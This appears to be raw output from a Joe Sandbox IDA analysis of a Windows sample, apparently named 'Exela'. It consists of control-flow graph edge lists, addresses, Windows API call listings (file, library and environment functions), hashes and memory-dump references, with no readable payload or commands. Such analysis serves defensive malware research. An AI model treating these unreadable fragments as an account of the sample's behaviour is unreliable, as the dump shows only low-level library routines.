EnterCriticalSection 18710->18718 18713 7ff6e3a79197 18711->18713 18713->18707 18720 7ff6e3a70563 18719->18720 18721 7ff6e3a70591 18719->18721 18722 7ff6e3a7b3b8 _invalid_parameter_noinfo 37 API calls 18720->18722 18724 7ff6e3a70583 18721->18724 18729 7ff6e3a7594c EnterCriticalSection 18721->18729 18722->18724 18724->16522 18731 7ff6e3a6c06e RtlLookupFunctionEntry 18730->18731 18732 7ff6e3a6be8b 18731->18732 18733 7ff6e3a6c084 RtlVirtualUnwind 18731->18733 18734 7ff6e3a6be20 SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 18732->18734 18733->18731 18733->18732 18736 7ff6e3a63fc0 116 API calls 18735->18736 18737 7ff6e3a615b7 18736->18737 18738 7ff6e3a615bf 18737->18738 18739 7ff6e3a615e0 18737->18739 18740 7ff6e3a62b10 59 API calls 18738->18740 18741 7ff6e3a70df4 73 API calls 18739->18741 18742 7ff6e3a615cf 18740->18742 18743 7ff6e3a615f1 18741->18743 18742->16536 18744 7ff6e3a615f5 18743->18744 18745 7ff6e3a61611 18743->18745 18746 7ff6e3a62870 59 API calls 18744->18746 18747 7ff6e3a61641 18745->18747 18748 7ff6e3a61621 18745->18748 18755 7ff6e3a6160c __std_exception_copy 18746->18755 18750 7ff6e3a61656 18747->18750 18756 7ff6e3a6166d 18747->18756 18749 7ff6e3a62870 59 API calls 18748->18749 18749->18755 18752 7ff6e3a61050 98 API calls 18750->18752 18751 7ff6e3a7076c 74 API calls 18753 7ff6e3a616e7 18751->18753 18752->18755 18753->16536 18754 7ff6e3a70abc _fread_nolock 53 API calls 18754->18756 18755->18751 18756->18754 18756->18755 18757 7ff6e3a616ae 18756->18757 18758 7ff6e3a62870 59 API calls 18757->18758 18758->18755 18761 7ff6e3a619c3 18759->18761 18762 7ff6e3a6195f 18759->18762 18760 7ff6e3a75650 45 API calls 18760->18762 18761->16555 18762->18760 18762->18761 18764 7ff6e3a68bd0 57 API calls 18763->18764 18765 7ff6e3a68277 LoadLibraryExW 18764->18765 18766 7ff6e3a68294 __std_exception_copy 18765->18766 18766->16563 18768 7ff6e3a66f3c GetProcAddress 18767->18768 18769 7ff6e3a66f19 18767->18769 18768->18769 18770 7ff6e3a66f61 GetProcAddress 18768->18770 18772 7ff6e3a629c0 57 API calls 18769->18772 18770->18769 18771 7ff6e3a66f86 GetProcAddress 18770->18771 18771->18769 18773 7ff6e3a66fae GetProcAddress 18771->18773 18774 7ff6e3a66f2c 18772->18774 18773->18769 18775 7ff6e3a66fd6 GetProcAddress 18773->18775 18774->16570 18775->18769 18776 7ff6e3a66ffe GetProcAddress 18775->18776 18777 7ff6e3a6701a 18776->18777 18778 7ff6e3a67026 GetProcAddress 18776->18778 18777->18778 18827 7ff6e3a65bd0 18826->18827 18828 7ff6e3a61ee0 49 API calls 18827->18828 18829 7ff6e3a65c02 18828->18829 18830 7ff6e3a65c0b 18829->18830 18832 7ff6e3a65c2b 18829->18832 18833 7ff6e3a62b10 59 API calls 18830->18833 18831 7ff6e3a65c82 18836 7ff6e3a64040 49 API calls 18831->18836 18832->18831 18835 7ff6e3a64040 49 API calls 18832->18835 18834 7ff6e3a65c21 18833->18834 18840 7ff6e3a6be00 _wfindfirst32i64 8 API calls 18834->18840 18837 7ff6e3a65c4c 18835->18837 18838 7ff6e3a65c9b 18836->18838 18839 7ff6e3a65c6a 18837->18839 18844 7ff6e3a62b10 59 API calls 18837->18844 18841 7ff6e3a65cb9 18838->18841 18842 7ff6e3a62b10 59 API calls 18838->18842 18845 7ff6e3a63f50 57 API calls 18839->18845 18846 7ff6e3a6344e 18840->18846 18843 7ff6e3a68260 58 API calls 18841->18843 18842->18841 18847 7ff6e3a65cc6 18843->18847 18844->18839 18848 7ff6e3a65c74 18845->18848 18846->16584 18854 7ff6e3a65d20 18846->18854 18849 7ff6e3a65ccb 18847->18849 18850 7ff6e3a65ced 18847->18850 18848->18831 18853 7ff6e3a68260 58 API calls 18848->18853 18851 7ff6e3a629c0 57 API calls 18849->18851 18924 7ff6e3a651e0 GetProcAddress 18850->18924 18851->18834 18853->18831 19008 7ff6e3a64de0 18854->19008 18856 7ff6e3a65d44 18857 7ff6e3a65d5d 18856->18857 18858 7ff6e3a65d4c 18856->18858 19015 7ff6e3a64520 18857->19015 18860 7ff6e3a62b10 59 API calls 18858->18860 18865 7ff6e3a65d58 18860->18865 18862 7ff6e3a65d7a 18866 7ff6e3a65d87 18862->18866 18867 7ff6e3a65d98 18862->18867 18863 7ff6e3a65d69 18864 7ff6e3a62b10 59 API calls 18863->18864 18864->18865 18865->16586 18868 7ff6e3a62b10 59 API calls 18866->18868 19019 7ff6e3a64870 18867->19019 18868->18865 18896 7ff6e3a65937 18895->18896 18896->18896 18897 7ff6e3a65960 18896->18897 18903 7ff6e3a65977 __std_exception_copy 18896->18903 18898 7ff6e3a62b10 59 API calls 18897->18898 18899 7ff6e3a6596c 18898->18899 18899->16588 18900 7ff6e3a65a65 18900->16588 18901 7ff6e3a61590 122 API calls 18901->18903 18902 7ff6e3a62b10 59 API calls 18902->18903 18903->18900 18903->18901 18903->18902 18925 7ff6e3a65202 18924->18925 18926 7ff6e3a65220 GetProcAddress 18924->18926 18928 7ff6e3a629c0 57 API calls 18925->18928 18926->18925 18927 7ff6e3a65245 GetProcAddress 18926->18927 18927->18925 18929 7ff6e3a6526a GetProcAddress 18927->18929 18931 7ff6e3a65215 18928->18931 18929->18925 18930 7ff6e3a65292 GetProcAddress 18929->18930 18930->18925 18932 7ff6e3a652ba GetProcAddress 18930->18932 18931->18834 18932->18925 18933 7ff6e3a652e2 GetProcAddress 18932->18933 18933->18925 18934 7ff6e3a6530a GetProcAddress 18933->18934 18935 7ff6e3a65326 18934->18935 18936 7ff6e3a65332 GetProcAddress 18934->18936 18935->18936 18937 7ff6e3a6535a GetProcAddress 18936->18937 18938 7ff6e3a6534e 18936->18938 18939 7ff6e3a65376 18937->18939 18940 7ff6e3a65382 GetProcAddress 18937->18940 18938->18937 18939->18940 19010 7ff6e3a64e05 19008->19010 19009 7ff6e3a64e0d 19009->18856 19010->19009 19011 7ff6e3a64f9f 19010->19011 19050 7ff6e3a77598 19010->19050 19012 7ff6e3a64240 47 API calls 19011->19012 19013 7ff6e3a6514a __std_exception_copy 19011->19013 19012->19011 19013->18856 19016 7ff6e3a64550 19015->19016 19017 7ff6e3a6be00 _wfindfirst32i64 8 API calls 19016->19017 19018 7ff6e3a645ba 19017->19018 19018->18862 19018->18863 19020 7ff6e3a648e1 19019->19020 19023 7ff6e3a64884 19019->19023 19021 7ff6e3a643c0 57 API calls 19020->19021 19025 7ff6e3a648cc 19023->19025 19108 7ff6e3a643c0 19023->19108 19051 7ff6e3a775c8 19050->19051 19054 7ff6e3a76a94 19051->19054 19053 7ff6e3a775f8 19053->19010 19055 7ff6e3a76ad7 19054->19055 19056 7ff6e3a76ac5 19054->19056 19058 7ff6e3a76b21 19055->19058 19060 7ff6e3a76ae4 19055->19060 19057 7ff6e3a75aa4 _get_daylight 11 API calls 19056->19057 19059 7ff6e3a76aca 19057->19059 19061 7ff6e3a76b3c 19058->19061 19065 7ff6e3a74ee0 45 API calls 19058->19065 19063 7ff6e3a7b484 _invalid_parameter_noinfo 37 API calls 19059->19063 19064 7ff6e3a7b3b8 _invalid_parameter_noinfo 37 API calls 19060->19064 19068 7ff6e3a76b5e 19061->19068 19075 7ff6e3a77520 19061->19075 19066 7ff6e3a76ad5 19063->19066 19064->19066 19065->19061 19066->19053 19067 7ff6e3a76bff 19067->19066 19070 7ff6e3a75aa4 _get_daylight 11 API calls 19067->19070 19068->19067 19069 7ff6e3a75aa4 _get_daylight 11 API calls 19068->19069 19071 7ff6e3a76bf4 19069->19071 19072 7ff6e3a76caa 19070->19072 19073 7ff6e3a7b484 _invalid_parameter_noinfo 37 API calls 19071->19073 19074 7ff6e3a7b484 _invalid_parameter_noinfo 37 API calls 19072->19074 19073->19067 19074->19066 19076 7ff6e3a77543 19075->19076 19078 7ff6e3a7755a 19075->19078 19081 7ff6e3a80f28 19076->19081 19079 7ff6e3a77548 19078->19079 19086 7ff6e3a80f58 19078->19086 19079->19061 19082 7ff6e3a7bcf0 __FrameHandler3::FrameUnwindToEmptyState 45 API calls 19081->19082 19083 7ff6e3a80f31 19082->19083 19084 7ff6e3a7e524 45 API calls 19083->19084 19087 7ff6e3a75578 45 API calls 19086->19087 19088 7ff6e3a80f91 19087->19088 19091 7ff6e3a80f9d 19088->19091 19093 7ff6e3a83a90 19088->19093 19150 7ff6e3a758fb 19149->19150 19158 7ff6e3a7fd44 19150->19158 19171 7ff6e3a81298 EnterCriticalSection 19158->19171 19173 7ff6e3a7bcf0 __FrameHandler3::FrameUnwindToEmptyState 45 API calls 19172->19173 19174 7ff6e3a7af51 19173->19174 19175 7ff6e3a7b07c __FrameHandler3::FrameUnwindToEmptyState 45 API calls 19174->19175 19176 7ff6e3a7af71 19175->19176 20419 7ff6e3a6afbc 20420 7ff6e3a6a3c3 20419->20420 20422 7ff6e3a6a446 20419->20422 20421 7ff6e3a6b640 12 API calls 20420->20421 20420->20422 20421->20422 19723 7ff6e3a7a8c0 19726 7ff6e3a7a83c 19723->19726 19733 7ff6e3a81298 EnterCriticalSection 19726->19733 19734 7ff6e3a7d0c0 19745 7ff6e3a81298 EnterCriticalSection 19734->19745 19231 7ff6e3a7842c 19232 7ff6e3a7845a 19231->19232 19233 7ff6e3a78493 19231->19233 19235 7ff6e3a75aa4 _get_daylight 11 API calls 19232->19235 19233->19232 19234 7ff6e3a78498 FindFirstFileExW 19233->19234 19236 7ff6e3a784ba GetLastError 19234->19236 19237 7ff6e3a78501 19234->19237 19238 7ff6e3a7845f 19235->19238 19240 7ff6e3a784c5 19236->19240 19241 7ff6e3a784f1 19236->19241 19291 7ff6e3a7869c 19237->19291 19242 7ff6e3a7b484 _invalid_parameter_noinfo 37 API calls 19238->19242 19240->19241 19247 7ff6e3a784e1 19240->19247 19248 7ff6e3a784cf 19240->19248 19245 7ff6e3a75aa4 _get_daylight 11 API calls 19241->19245 19244 7ff6e3a7846a 19242->19244 19249 7ff6e3a6be00 _wfindfirst32i64 8 API calls 19244->19249 19245->19244 19246 7ff6e3a7869c _wfindfirst32i64 10 API calls 19250 7ff6e3a78527 19246->19250 19252 7ff6e3a75aa4 _get_daylight 11 API calls 19247->19252 19248->19241 19251 7ff6e3a784d4 19248->19251 19253 7ff6e3a7847e 19249->19253 19254 7ff6e3a7869c _wfindfirst32i64 10 API calls 19250->19254 19255 7ff6e3a75aa4 _get_daylight 11 API calls 19251->19255 19252->19244 19256 7ff6e3a78535 19254->19256 19255->19244 19257 7ff6e3a81434 _wfindfirst32i64 37 API calls 19256->19257 19258 7ff6e3a78553 19257->19258 19258->19244 19259 7ff6e3a7855f 19258->19259 19260 7ff6e3a7b4a4 _wfindfirst32i64 17 API calls 19259->19260 19261 7ff6e3a78573 19260->19261 19262 7ff6e3a7859d 19261->19262 19265 7ff6e3a785dc FindNextFileW 19261->19265 19263 7ff6e3a75aa4 _get_daylight 11 API calls 19262->19263 19264 7ff6e3a785a2 19263->19264 19266 7ff6e3a7b484 _invalid_parameter_noinfo 37 API calls 19264->19266 19267 7ff6e3a7862c 19265->19267 19268 7ff6e3a785eb GetLastError 19265->19268 19282 7ff6e3a785ad 19266->19282 19269 7ff6e3a7869c _wfindfirst32i64 10 API calls 19267->19269 19270 7ff6e3a785f6 19268->19270 19271 7ff6e3a7861f 19268->19271 19273 7ff6e3a78644 19269->19273 19270->19271 19276 7ff6e3a78612 19270->19276 19277 7ff6e3a78600 19270->19277 19272 7ff6e3a75aa4 _get_daylight 11 API calls 19271->19272 19272->19282 19275 7ff6e3a7869c _wfindfirst32i64 10 API calls 19273->19275 19274 7ff6e3a6be00 _wfindfirst32i64 8 API calls 19279 7ff6e3a785c0 19274->19279 19280 7ff6e3a78652 19275->19280 19278 7ff6e3a75aa4 _get_daylight 11 API calls 19276->19278 19277->19271 19281 7ff6e3a78605 19277->19281 19278->19282 19283 7ff6e3a7869c _wfindfirst32i64 10 API calls 19280->19283 19284 7ff6e3a75aa4 _get_daylight 11 API calls 19281->19284 19282->19274 19285 7ff6e3a78660 19283->19285 19284->19282 19286 7ff6e3a81434 _wfindfirst32i64 37 API calls 19285->19286 19287 7ff6e3a7867e 19286->19287 19287->19282 19288 7ff6e3a78686 19287->19288 19289 7ff6e3a7b4a4 _wfindfirst32i64 17 API calls 19288->19289 19290 7ff6e3a7869a 19289->19290 19292 7ff6e3a786ba FileTimeToSystemTime 19291->19292 19293 7ff6e3a786b4 19291->19293 19294 7ff6e3a786c9 SystemTimeToTzSpecificLocalTime 19292->19294 19296 7ff6e3a786df 19292->19296 19293->19292 19293->19296 19294->19296 19295 7ff6e3a6be00 _wfindfirst32i64 8 API calls 19297 7ff6e3a78519 19295->19297 19296->19295 19297->19246 20320 7ff6e3a8bca9 20321 7ff6e3a8bcc2 20320->20321 20322 7ff6e3a8bcb8 20320->20322 20324 7ff6e3a812f8 LeaveCriticalSection 20322->20324 20368 7ff6e3a8ba8e 20369 7ff6e3a8ba9e 20368->20369 20372 7ff6e3a75958 LeaveCriticalSection 20369->20372 20841 7ff6e3a69b8b 20843 7ff6e3a69b91 20841->20843 20842 7ff6e3a6a446 20843->20842 20844 7ff6e3a6b640 12 API calls 20843->20844 20844->20842 20442 7ff6e3a8bc14 20445 7ff6e3a75958 LeaveCriticalSection 20442->20445 19341 7ff6e3a6b390 19342 7ff6e3a6b3be 19341->19342 19343 7ff6e3a6b3a5 19341->19343 19343->19342 19345 7ff6e3a7e19c 12 API calls 19343->19345 19344 7ff6e3a6b41c 19345->19344 20238 7ff6e3a82300 20249 7ff6e3a88294 20238->20249 20250 7ff6e3a882a1 20249->20250 20251 7ff6e3a7b4ec __free_lconv_num 11 API calls 20250->20251 20252 7ff6e3a882bd 20250->20252 20251->20250 20253 7ff6e3a7b4ec __free_lconv_num 11 API calls 20252->20253 20254 7ff6e3a82309 20252->20254 20253->20252 20255 7ff6e3a81298 EnterCriticalSection 20254->20255

                                                                                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                                                                                            • Executed
                                                                                                                                                                                                                                                            • Not Executed
                                                                                                                                                                                                                                                            control_flow_graph 111 7ff6e3a86950-7ff6e3a8698b call 7ff6e3a862d8 call 7ff6e3a862e0 call 7ff6e3a86348 118 7ff6e3a86bb5-7ff6e3a86c01 call 7ff6e3a7b4a4 call 7ff6e3a862d8 call 7ff6e3a862e0 call 7ff6e3a86348 111->118 119 7ff6e3a86991-7ff6e3a8699c call 7ff6e3a862e8 111->119 144 7ff6e3a86c07-7ff6e3a86c12 call 7ff6e3a862e8 118->144 145 7ff6e3a86d3f-7ff6e3a86dad call 7ff6e3a7b4a4 call 7ff6e3a821c8 118->145 119->118 125 7ff6e3a869a2-7ff6e3a869ac 119->125 126 7ff6e3a869ce-7ff6e3a869d2 125->126 127 7ff6e3a869ae-7ff6e3a869b1 125->127 129 7ff6e3a869d5-7ff6e3a869dd 126->129 130 7ff6e3a869b4-7ff6e3a869bf 127->130 129->129 133 7ff6e3a869df-7ff6e3a869f2 call 7ff6e3a7e19c 129->133 134 7ff6e3a869ca-7ff6e3a869cc 130->134 135 7ff6e3a869c1-7ff6e3a869c8 130->135 142 7ff6e3a86a0a-7ff6e3a86a16 call 7ff6e3a7b4ec 133->142 143 7ff6e3a869f4-7ff6e3a869f6 call 7ff6e3a7b4ec 133->143 134->126 137 7ff6e3a869fb-7ff6e3a86a09 134->137 135->130 135->134 153 7ff6e3a86a1d-7ff6e3a86a25 142->153 143->137 144->145 154 7ff6e3a86c18-7ff6e3a86c23 call 7ff6e3a86318 144->154 165 7ff6e3a86dbb-7ff6e3a86dbe 145->165 166 7ff6e3a86daf-7ff6e3a86db6 145->166 153->153 156 7ff6e3a86a27-7ff6e3a86a38 call 7ff6e3a81434 153->156 154->145 164 7ff6e3a86c29-7ff6e3a86c4c call 7ff6e3a7b4ec GetTimeZoneInformation 154->164 156->118 163 7ff6e3a86a3e-7ff6e3a86a94 call 7ff6e3a8b380 * 4 call 7ff6e3a8686c 156->163 224 7ff6e3a86a96-7ff6e3a86a9a 163->224 181 7ff6e3a86d14-7ff6e3a86d3e call 7ff6e3a862d0 call 7ff6e3a862c0 call 7ff6e3a862c8 164->181 182 7ff6e3a86c52-7ff6e3a86c73 164->182 168 7ff6e3a86df5-7ff6e3a86e08 call 7ff6e3a7e19c 165->168 169 7ff6e3a86dc0 165->169 171 7ff6e3a86e4b-7ff6e3a86e4e 166->171 184 7ff6e3a86e0a 168->184 185 7ff6e3a86e13-7ff6e3a86e2e call 7ff6e3a821c8 168->185 174 7ff6e3a86dc3 169->174 173 7ff6e3a86e54-7ff6e3a86e5c call 7ff6e3a86950 171->173 171->174 179 7ff6e3a86dc8-7ff6e3a86df4 call 7ff6e3a7b4ec call 7ff6e3a6be00 173->179 174->179 180 7ff6e3a86dc3 call 7ff6e3a86bcc 174->180 180->179 189 7ff6e3a86c75-7ff6e3a86c7b 182->189 190 7ff6e3a86c7e-7ff6e3a86c85 182->190 195 7ff6e3a86e0c-7ff6e3a86e11 call 7ff6e3a7b4ec 184->195 210 7ff6e3a86e35-7ff6e3a86e47 call 7ff6e3a7b4ec 185->210 211 7ff6e3a86e30-7ff6e3a86e33 185->211 189->190 192 7ff6e3a86c99 190->192 193 7ff6e3a86c87-7ff6e3a86c8f 190->193 205 7ff6e3a86c9b-7ff6e3a86d0f call 7ff6e3a8b380 * 4 call 7ff6e3a837ac call 7ff6e3a86e64 * 2 192->205 193->192 199 7ff6e3a86c91-7ff6e3a86c97 193->199 195->169 199->205 205->181 210->171 211->195 226 7ff6e3a86a9c 224->226 227 7ff6e3a86aa0-7ff6e3a86aa4 224->227 226->227 227->224 229 7ff6e3a86aa6-7ff6e3a86acb call 7ff6e3a7764c 227->229 234 7ff6e3a86ace-7ff6e3a86ad2 229->234 236 7ff6e3a86ad4-7ff6e3a86adf 234->236 237 7ff6e3a86ae1-7ff6e3a86ae5 234->237 236->237 239 7ff6e3a86ae7-7ff6e3a86aeb 236->239 237->234 241 7ff6e3a86aed-7ff6e3a86b15 call 7ff6e3a7764c 239->241 242 7ff6e3a86b6c-7ff6e3a86b70 239->242 251 7ff6e3a86b17 241->251 252 7ff6e3a86b33-7ff6e3a86b37 241->252 244 7ff6e3a86b77-7ff6e3a86b84 242->244 245 7ff6e3a86b72-7ff6e3a86b74 242->245 247 7ff6e3a86b86-7ff6e3a86b9c call 7ff6e3a8686c 244->247 248 7ff6e3a86b9f-7ff6e3a86bae call 7ff6e3a862d0 call 7ff6e3a862c0 244->248 245->244 247->248 248->118 255 7ff6e3a86b1a-7ff6e3a86b21 251->255 252->242 257 7ff6e3a86b39-7ff6e3a86b57 call 7ff6e3a7764c 252->257 255->252 258 7ff6e3a86b23-7ff6e3a86b31 255->258 263 7ff6e3a86b63-7ff6e3a86b6a 257->263 258->252 258->255 263->242 264 7ff6e3a86b59-7ff6e3a86b5d 263->264 264->242 265 7ff6e3a86b5f 264->265 265->263
                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                            • _get_daylight.LIBCMT ref: 00007FF6E3A86995
                                                                                                                                                                                                                                                              • Part of subcall function 00007FF6E3A862E8: _invalid_parameter_noinfo.LIBCMT ref: 00007FF6E3A862FC
                                                                                                                                                                                                                                                              • Part of subcall function 00007FF6E3A7B4EC: RtlRestoreThreadPreferredUILanguages.NTDLL(?,?,?,00007FF6E3A83972,?,?,?,00007FF6E3A839AF,?,?,00000000,00007FF6E3A83E75,?,?,00000000,00007FF6E3A83DA7), ref: 00007FF6E3A7B502
                                                                                                                                                                                                                                                              • Part of subcall function 00007FF6E3A7B4EC: GetLastError.KERNEL32(?,?,?,00007FF6E3A83972,?,?,?,00007FF6E3A839AF,?,?,00000000,00007FF6E3A83E75,?,?,00000000,00007FF6E3A83DA7), ref: 00007FF6E3A7B50C
                                                                                                                                                                                                                                                              • Part of subcall function 00007FF6E3A7B4A4: IsProcessorFeaturePresent.KERNEL32(?,?,?,?,00007FF6E3A7B483,?,?,?,?,?,00007FF6E3A736AC), ref: 00007FF6E3A7B4AD
                                                                                                                                                                                                                                                              • Part of subcall function 00007FF6E3A7B4A4: GetCurrentProcess.KERNEL32(?,?,?,?,00007FF6E3A7B483,?,?,?,?,?,00007FF6E3A736AC), ref: 00007FF6E3A7B4D2
                                                                                                                                                                                                                                                            • _get_daylight.LIBCMT ref: 00007FF6E3A86984
                                                                                                                                                                                                                                                              • Part of subcall function 00007FF6E3A86348: _invalid_parameter_noinfo.LIBCMT ref: 00007FF6E3A8635C
                                                                                                                                                                                                                                                            • _get_daylight.LIBCMT ref: 00007FF6E3A86BFA
                                                                                                                                                                                                                                                            • _get_daylight.LIBCMT ref: 00007FF6E3A86C0B
                                                                                                                                                                                                                                                            • _get_daylight.LIBCMT ref: 00007FF6E3A86C1C
                                                                                                                                                                                                                                                            • GetTimeZoneInformation.KERNELBASE(?,?,?,?,?,?,?,?,?,00000000,?,00007FF6E3A86E5C), ref: 00007FF6E3A86C43
                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000051.00000002.1852720107.00007FF6E3A61000.00000020.00000001.01000000.0000002A.sdmp, Offset: 00007FF6E3A60000, based on PE: true
                                                                                                                                                                                                                                                            • Associated: 00000051.00000002.1852677009.00007FF6E3A60000.00000002.00000001.01000000.0000002A.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000051.00000002.1852775455.00007FF6E3A8C000.00000002.00000001.01000000.0000002A.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000051.00000002.1852834253.00007FF6E3A9F000.00000004.00000001.01000000.0000002A.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000051.00000002.1852834253.00007FF6E3AA1000.00000004.00000001.01000000.0000002A.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000051.00000002.1852923013.00007FF6E3AA3000.00000002.00000001.01000000.0000002A.sdmpDownload File
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_81_2_7ff6e3a60000_Exela.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: _get_daylight$_invalid_parameter_noinfo$CurrentErrorFeatureInformationLanguagesLastPreferredPresentProcessProcessorRestoreThreadTimeZone
                                                                                                                                                                                                                                                            • String ID: W. Europe Standard Time$W. Europe Summer Time
                                                                                                                                                                                                                                                            • API String ID: 1458651798-690618308
                                                                                                                                                                                                                                                            • Opcode ID: 6ec15ad00ebc81b5713ed5170bbebc68efdd6324f1cef62f169a4dbf8db42b45
                                                                                                                                                                                                                                                            • Instruction ID: 50df7a22b762983b0dd59f95e420ceb9e62d122dc65dd60885d72446834a1aa8
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 6ec15ad00ebc81b5713ed5170bbebc68efdd6324f1cef62f169a4dbf8db42b45
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: C5D1D427B0828245F7249F2DE44A3B96B61EF44784F418135DB0DE7AA5DF3EE4C1874A
                                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                                                                                            • Executed
                                                                                                                                                                                                                                                            • Not Executed
                                                                                                                                                                                                                                                            control_flow_graph 444 7ff6e3a8789c-7ff6e3a8790f call 7ff6e3a875d0 447 7ff6e3a87929-7ff6e3a87933 call 7ff6e3a78a14 444->447 448 7ff6e3a87911-7ff6e3a8791a call 7ff6e3a75a84 444->448 453 7ff6e3a87935-7ff6e3a8794c call 7ff6e3a75a84 call 7ff6e3a75aa4 447->453 454 7ff6e3a8794e-7ff6e3a879b7 CreateFileW 447->454 455 7ff6e3a8791d-7ff6e3a87924 call 7ff6e3a75aa4 448->455 453->455 457 7ff6e3a879b9-7ff6e3a879bf 454->457 458 7ff6e3a87a34-7ff6e3a87a3f GetFileType 454->458 466 7ff6e3a87c6a-7ff6e3a87c8a 455->466 463 7ff6e3a87a01-7ff6e3a87a2f GetLastError call 7ff6e3a75a18 457->463 464 7ff6e3a879c1-7ff6e3a879c5 457->464 460 7ff6e3a87a92-7ff6e3a87a99 458->460 461 7ff6e3a87a41-7ff6e3a87a7c GetLastError call 7ff6e3a75a18 CloseHandle 458->461 469 7ff6e3a87a9b-7ff6e3a87a9f 460->469 470 7ff6e3a87aa1-7ff6e3a87aa4 460->470 461->455 478 7ff6e3a87a82-7ff6e3a87a8d call 7ff6e3a75aa4 461->478 463->455 464->463 471 7ff6e3a879c7-7ff6e3a879ff CreateFileW 464->471 475 7ff6e3a87aaa-7ff6e3a87aff call 7ff6e3a7892c 469->475 470->475 476 7ff6e3a87aa6 470->476 471->458 471->463 483 7ff6e3a87b01-7ff6e3a87b0d call 7ff6e3a877d8 475->483 484 7ff6e3a87b1e-7ff6e3a87b4f call 7ff6e3a87350 475->484 476->475 478->455 483->484 489 7ff6e3a87b0f 483->489 490 7ff6e3a87b55-7ff6e3a87b97 484->490 491 7ff6e3a87b51-7ff6e3a87b53 484->491 492 7ff6e3a87b11-7ff6e3a87b19 call 7ff6e3a7b664 489->492 493 7ff6e3a87bb9-7ff6e3a87bc4 490->493 494 7ff6e3a87b99-7ff6e3a87b9d 490->494 491->492 492->466 497 7ff6e3a87bca-7ff6e3a87bce 493->497 498 7ff6e3a87c68 493->498 494->493 496 7ff6e3a87b9f-7ff6e3a87bb4 494->496 496->493 497->498 500 7ff6e3a87bd4-7ff6e3a87c19 CloseHandle CreateFileW 497->500 498->466 501 7ff6e3a87c1b-7ff6e3a87c49 GetLastError call 7ff6e3a75a18 call 7ff6e3a78b54 500->501 502 7ff6e3a87c4e-7ff6e3a87c63 500->502 501->502 502->498
                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000051.00000002.1852720107.00007FF6E3A61000.00000020.00000001.01000000.0000002A.sdmp, Offset: 00007FF6E3A60000, based on PE: true
                                                                                                                                                                                                                                                            • Associated: 00000051.00000002.1852677009.00007FF6E3A60000.00000002.00000001.01000000.0000002A.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000051.00000002.1852775455.00007FF6E3A8C000.00000002.00000001.01000000.0000002A.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000051.00000002.1852834253.00007FF6E3A9F000.00000004.00000001.01000000.0000002A.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000051.00000002.1852834253.00007FF6E3AA1000.00000004.00000001.01000000.0000002A.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000051.00000002.1852923013.00007FF6E3AA3000.00000002.00000001.01000000.0000002A.sdmpDownload File
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_81_2_7ff6e3a60000_Exela.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: File$CreateErrorLast_invalid_parameter_noinfo$CloseHandle$Type
                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                            • API String ID: 1617910340-0
                                                                                                                                                                                                                                                            • Opcode ID: ed7bb29f19db96d6df9cef71716606d4f492670f90b16f42eaf9bff86babf69b
                                                                                                                                                                                                                                                            • Instruction ID: 7f34e90dd2a4a6e28d425d9a12fc36581cb61f1d591b693d1b85bbb95a6b1dbd
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: ed7bb29f19db96d6df9cef71716606d4f492670f90b16f42eaf9bff86babf69b
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: ADC1B137B28A8285EB10CF68C4866BC3B71EB49B98B010235DA1EA77D4DF3BD595C305
                                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                            • GetTempPathW.KERNEL32(00000000,?,00000000,00000000,?,00007FF6E3A6153F), ref: 00007FF6E3A679E7
                                                                                                                                                                                                                                                              • Part of subcall function 00007FF6E3A67B60: GetEnvironmentVariableW.KERNEL32(00007FF6E3A639FF), ref: 00007FF6E3A67B9A
                                                                                                                                                                                                                                                              • Part of subcall function 00007FF6E3A67B60: ExpandEnvironmentStringsW.KERNEL32 ref: 00007FF6E3A67BB7
                                                                                                                                                                                                                                                              • Part of subcall function 00007FF6E3A783CC: _invalid_parameter_noinfo.LIBCMT ref: 00007FF6E3A783E5
                                                                                                                                                                                                                                                            • SetEnvironmentVariableW.KERNEL32 ref: 00007FF6E3A67AA1
                                                                                                                                                                                                                                                              • Part of subcall function 00007FF6E3A62B10: MessageBoxW.USER32 ref: 00007FF6E3A62BE5
                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000051.00000002.1852720107.00007FF6E3A61000.00000020.00000001.01000000.0000002A.sdmp, Offset: 00007FF6E3A60000, based on PE: true
                                                                                                                                                                                                                                                            • Associated: 00000051.00000002.1852677009.00007FF6E3A60000.00000002.00000001.01000000.0000002A.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000051.00000002.1852775455.00007FF6E3A8C000.00000002.00000001.01000000.0000002A.sdmpDownload File
